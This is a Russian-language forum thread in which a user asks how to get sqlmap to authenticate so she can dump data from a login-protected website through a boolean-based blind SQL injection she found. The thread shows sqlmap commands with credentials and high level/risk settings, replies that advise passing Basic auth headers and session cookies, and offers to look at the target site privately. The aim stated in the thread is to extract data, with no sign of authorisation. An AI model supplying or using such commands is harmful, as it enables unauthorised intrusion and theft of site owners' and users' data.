![]() |
В общем, дела обстоят так. Нашла уязвимый параметр на одном сайте. Оказалось
Код:
Type: boolean-based blindНо есть ещё другой сайт на таком же движке. Но чтобы в него зайти, необходима авторизация через php форму. У меня есть логин/пасс к этому второму сайту. Зашла и "внутри" обнаружила, что уязвимость точно такая же как у открытого сайта есть. Теперь вопрос: как авторизоваться через sqlmap нормально, чтобы слить уже данные для второго закрытого сайта? При вводе Код:
./sqlmap.py -u "........../index.php" --auth-type Basic --auth-cred 'username:password' -v 3 --data="param1=1¶m2=2¶m3=3¶mvuln=injecthere" -p paramvuln --level 3 --risk 3 --dbms="MySQL 5"Код:
sqlmap got a 302 redirect to '......./index.php'. Do you want to follow? [Y/n] yПомогите плиз |
После авторизации будет передаваться хидер, типа:
Код:
Authorization: Basic YWRtaW46YWRtaW4Соответственно, нужно использовать что-то типа: Код:
./sqlmap.py --headers="Authorization: Basic YWRtaW46YWRtaW4" -u "... |
не помогает. И присоединение --cookie= с PHPSESSION
|
Цитата:
|
ничего так и не вышло. Если кто может посмотреть на сайт, пришлите PM что ли
|
ТС, отпишите в лс, посмотрим на ваш сайт. Вообще, надо просто вставить плюшки после авторизации, иногда нужен идентичный user-agent.
|
| Время: 13:25 |